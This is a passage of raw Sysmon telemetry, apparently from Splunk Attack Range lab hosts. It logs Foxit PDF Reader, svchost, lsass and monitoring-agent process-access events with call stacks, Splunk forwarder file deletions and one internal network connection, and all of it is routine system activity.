Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64) 10341000x800000000000000040477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.851{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.835{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc75f(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.835{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc6ae(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.835{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64) 10341000x800000000000000040473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.835{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64) 23542300x800000000000000040472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.648{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=AACA098F7C9E0F7C402E576ECB4A3556,SHA256=6255B87E0198A11F57F525A7D8721EE75CD4E2E3CFD85F12789AB861C86FF007,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.436{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5B2BE13646222B5B1A3BF6E83392344,SHA256=F02200DE4EC02A08C025505700248F2DE6C3AE98D416D318A6AE2BEAB267673B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015467Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:21.996{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50053-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015466Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:24.051{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E903CBFF38A87E9B90CD92F3B49C1DA5,SHA256=E1F0F426726A3470DC566E47C4F211E2F60ABD6003FAC947C8E61B8F894077B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:25.511{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D956BE581B4A16014191FB3EA038CA2,SHA256=BE2A4243307324C7979307E9AE38DB73F1F586E54E8C954D530F891D29DFFC16,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015472Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:25.668{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015471Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:25.668{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015470Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:25.668{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015469Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:25.654{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015468Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:25.171{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ABF269F8775456805E21ED2D88CFC21,SHA256=6CEFED54C306FA8080A4F408EC23185D4001843932848DF9B31D33A9A5BD82C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:25.328{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:25.328{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:25.328{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64) 10341000x800000000000000040484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:25.328{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:25.328{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64) 10341000x800000000000000040508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.898{FE4C2B44-E318-63C7-EE05-00000000AF02}34803804C:\Windows\servicing\TrustedInstaller.exe{FE4C2B44-E318-63C7-EF05-00000000AF02}5628C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.5351_none_7f0b8fbe21ea4a21\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\combase.dll+7d0d8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000040507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.602{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E60C833C50CA2E80B9109BEC2922F6B,SHA256=F4CA2A36DE9E7A34F96C108045921206C455901F2629EA5C844A330D04A23C96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015473Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:26.255{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B22BC3DA35917C34259C7FB881A14E99,SHA256=4E3EAC7B448ADF92D5EFBAE2FB4EFB3190E9499690967939A87D3A489045F78A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.508{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=68D8760F1E27AD1CD79F124C8C54029E,SHA256=9F1DCAC3A76D82DAC216BECD322683536A13A96CD531E4A2583BBE03F476A52E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.397{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 